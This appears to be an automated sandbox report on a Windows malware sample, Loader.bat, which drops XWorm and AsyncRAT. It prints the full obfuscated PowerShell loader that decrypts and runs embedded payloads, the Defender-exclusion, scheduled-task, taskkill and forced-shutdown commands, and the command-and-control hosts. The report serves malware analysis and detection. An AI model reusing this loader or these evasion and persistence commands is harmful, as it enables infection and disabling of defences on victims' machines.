Analysis
-
max time kernel
244s -
max time network
247s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
15-07-2024 13:55
Static task
static1
Behavioral task
behavioral1
Sample
Loader.bat
Resource
win10v2004-20240709-en
Errors
General
-
Target
Loader.bat
-
Size
192KB
-
MD5
a94e4dec22b09ea37e33fdfa3638e5de
-
SHA1
f90c1ea98c741bc63a3260721d1974962b9241ce
-
SHA256
bb484dd134c649c660dbde9ceb4fe1fbac7e65fb934d8a9c288c1e86d1b189f4
-
SHA512
a747324043860c06f28d4d7880a1df9f2bfbc6563fd42dffa76f3425a123aeb9bef29a4706dd11851f25c58acbf0c2fdfed775d68e9cb888b88a77ff2c0c6e0b
-
SSDEEP
3072:GTv0B0ylSYSg4xt9mYNjvI6L41JOELI7m5Y+fk3T0dcZAIG0+BWtOy15c:Q0iyQC4xt4Y26c1kEU7uBuWMAISA5c
Malware Config
Extracted
xworm
unique-emotions.gl.at.ply.gg:54742
wiz.bounceme.net:6000
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
asyncrat
0.5.8
Default
card-buzz.gl.at.ply.gg:2497
rotrzgmheqhT
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/2788-98-0x0000000002A30000-0x0000000002A3C000-memory.dmp disable_win_def -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/memory/2844-25-0x0000000006F80000-0x0000000006FAC000-memory.dmp family_xworm behavioral1/files/0x000200000001e7b7-31.dat family_xworm behavioral1/memory/2788-40-0x0000000000960000-0x0000000000976000-memory.dmp family_xworm behavioral1/memory/2788-91-0x000000001CFC0000-0x000000001CFCE000-memory.dmp family_xworm -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/2844-28-0x00000000070E0000-0x00000000070F2000-memory.dmp family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 20 2844 powershell.exe 27 2844 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4456 powershell.exe 4076 powershell.exe 3172 powershell.exe 2844 powershell.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Update.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk Update.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk Update.exe -
Executes dropped EXE 5 IoCs
pid Process 2788 Update.exe 19004 Update.exe 19260 Update.exe 20260 Update.exe 13840 Update.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" Update.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: Update.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" Update.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4864 2844 WerFault.exe 88 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 4 IoCs
pid Process 2896 taskkill.exe 20440 taskkill.exe 19584 taskkill.exe 19528 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "227" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1604 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 2844 powershell.exe 2844 powershell.exe 3172 powershell.exe 3172 powershell.exe 4456 powershell.exe 4456 powershell.exe 4076 powershell.exe 4076 powershell.exe 2788 Update.exe 1308 msedge.exe 1308 msedge.exe 19012 msedge.exe 19012 msedge.exe 19764 identity_helper.exe 19764 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 19012 msedge.exe 19012 msedge.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2788 Update.exe Token: SeDebugPrivilege 3172 powershell.exe Token: SeDebugPrivilege 4456 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeDebugPrivilege 2788 Update.exe Token: SeDebugPrivilege 19004 Update.exe Token: SeDebugPrivilege 19260 Update.exe Token: SeDebugPrivilege 20260 Update.exe Token: SeDebugPrivilege 20440 taskkill.exe Token: SeDebugPrivilege 19584 taskkill.exe Token: SeDebugPrivilege 19528 taskkill.exe Token: SeDebugPrivilege 2896 taskkill.exe Token: 33 19320 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 19320 AUDIODG.EXE Token: SeDebugPrivilege 13840 Update.exe Token: SeShutdownPrivilege 20068 shutdown.exe Token: SeRemoteShutdownPrivilege 20068 shutdown.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 2788 Update.exe 2788 Update.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe 19012 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2788 Update.exe 2976 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 664 wrote to memory of 3672 664 cmd.exe 87 PID 664 wrote to memory of 3672 664 cmd.exe 87 PID 664 wrote to memory of 2844 664 cmd.exe 88 PID 664 wrote to memory of 2844 664 cmd.exe 88 PID 664 wrote to memory of 2844 664 cmd.exe 88 PID 2844 wrote to memory of 2788 2844 powershell.exe 90 PID 2844 wrote to memory of 2788 2844 powershell.exe 90 PID 2788 wrote to memory of 3172 2788 Update.exe 91 PID 2788 wrote to memory of 3172 2788 Update.exe 91 PID 2788 wrote to memory of 4456 2788 Update.exe 93 PID 2788 wrote to memory of 4456 2788 Update.exe 93 PID 2788 wrote to memory of 4076 2788 Update.exe 95 PID 2788 wrote to memory of 4076 2788 Update.exe 95 PID 2788 wrote to memory of 1604 2788 Update.exe 98 PID 2788 wrote to memory of 1604 2788 Update.exe 98 PID 2788 wrote to memory of 19012 2788 Update.exe 104 PID 2788 wrote to memory of 19012 2788 Update.exe 104 PID 19012 wrote to memory of 4564 19012 msedge.exe 105 PID 19012 wrote to memory of 4564 19012 msedge.exe 105 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 2984 19012 msedge.exe 106 PID 19012 wrote to memory of 1308 19012 msedge.exe 107 PID 19012 wrote to memory of 1308 19012 msedge.exe 107 PID 19012 wrote to memory of 2096 19012 msedge.exe 108 PID 19012 wrote to memory of 2096 19012 msedge.exe 108 PID 19012 wrote to memory of 2096 19012 msedge.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rP6ipY8ykCrcY/vqOWugxQ2mrpqqQx5JkOzMlDOKmOA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GH3abWd9uo3DMEDckKzwyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BZojv=New-Object System.IO.MemoryStream(,$param_var); $jqKwU=New-Object System.IO.MemoryStream; $YBFLc=New-Object System.IO.Compression.GZipStream($BZojv, [IO.Compression.CompressionMode]::Decompress); $YBFLc.CopyTo($jqKwU); $YBFLc.Dispose(); $BZojv.Dispose(); $jqKwU.Dispose(); $jqKwU.ToArray();}function execute_function($param_var,$param2_var){ $HnXah=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ASDSB=$HnXah.EntryPoint; $ASDSB.Invoke($null, $param2_var);}$HxmrU = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$host.UI.RawUI.WindowTitle = $HxmrU;$YminX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HxmrU).Split([Environment]::NewLine);foreach ($LBczd in $YminX) { if ($LBczd.StartsWith('zyIAYTpLJuqqlwNwSYZB')) { $nGVNd=$LBczd.Substring(20); break; }}$payloads_var=[string[]]$nGVNd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:3672
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\Update.exe"C:\Users\Admin\AppData\Local\Temp\Update.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:19012 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8795046f8,0x7ff879504708,0x7ff8795047185⤵PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:25⤵PID:2984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:1308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:85⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:15⤵PID:14096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:15⤵PID:19276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 /prefetch:85⤵PID:19592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:19764
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:20440
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:19584
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:19528
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\SYSTEM32\shutdown.exeshutdown.exe /f /r /t 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:20068
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 836883⤵
- Program crash
PID:4864
-
-
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:19004
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:19260
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:19164
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:19036
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:20260
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x524 0x4cc1⤵
- Suspicious use of AdjustPrivilegeToken
PID:19320
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:13840
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3903855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2844 -ip 28441⤵PID:20000
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD5a499254d6b5d91f97eb7a86e5f8ca573
SHA103dbfebfec8c94a9c06f9b0cd81ebe0a2b8be3d1
SHA256fb87b758c2b98989df851380293ff6786cb9a5cf2b3a384cec70d9f3eb064499
SHA512d7adcc76d0470bcd68d7644de3c8d2b6d61df8485979a4752ceea3df4d85bd1c290f72b3d8d5c8d639d5a10afa48d80e457f76b44dd8107ac97eb80fd98c7b0c
-
Filesize
152B
MD5bafce9e4c53a0cb85310891b6b21791b
SHA15d70027cc137a7cbb38f5801b15fd97b05e89ee2
SHA25671fb546b5d2210a56e90b448ee10120cd92c518c8f79fb960f01b918f89f2b00
SHA512c0e4d3eccc0135ac92051539a18f64b8b8628cfe74e5b019d4f8e1dcbb51a9b49c486a1523885fe6be53da7118c013852e753c26a5490538c1e721fd0188836c
-
Filesize
6KB
MD52e354814aff666d24b1e092a0e15f5e1
SHA198314512919713a2cfb2ff44f2e650aa7da43ae7
SHA256bd9744d0e24498200b8716b1f0ef77709af446fa618ece614898197cb1876dc2
SHA512bf5cf417d930165c1b3abc1be6b73a7f2aa451d519b7c7309fe1cfe0cf419813575b5de3dec6dfeb3791cc03ded111213d453c1e4a8b5afd22f4075a185c641e
-
Filesize
6KB
MD5676a02dd4daaec7be0f329fc0883ef95
SHA1b866b56ec113f6b934d7093ed830d13d7ff7e09f
SHA25655addb76f39d850d272f1d884f3ec88af8e688f6c8f65c67f90f7b3707f312b4
SHA512629805682018e6e4f7576f6976fd142d80d26fd31000801a65c2ef846487865c8e896e566b6e4530d9cec02bf9a7fada7fc1025f9ad6ff4530354a9697fc8801
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5eda47a9614ab02bf7bc5ed746fb87ced
SHA1de483e24c1f0ab29937128bae2be96abfe46fd5f
SHA256ed634e5db23f4b0882ef8a2d9b4cff4a55c2a37b361d540b76f1f1f95db43b26
SHA512838c9110f5ba56c4ebebaff7374947661e658ce96411734b5d1b4471ded25a9d67c3b749f67346b7b64cc90414e1ec2f972ef8add865923e453c5a2520de79f4
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
948B
MD53a1e249212d4af8ee7f335a5dfd075ba
SHA18ab2019e5d1376124bd79b822b9b1d4a794de076
SHA256046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa
SHA5128a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b
-
Filesize
948B
MD5c1a54dd5a1ab44cc4c4afd42f291c863
SHA1b77043ab3582680fc96192e9d333a6be0ae0f69d
SHA256c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75
SHA512010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d
-
Filesize
59KB
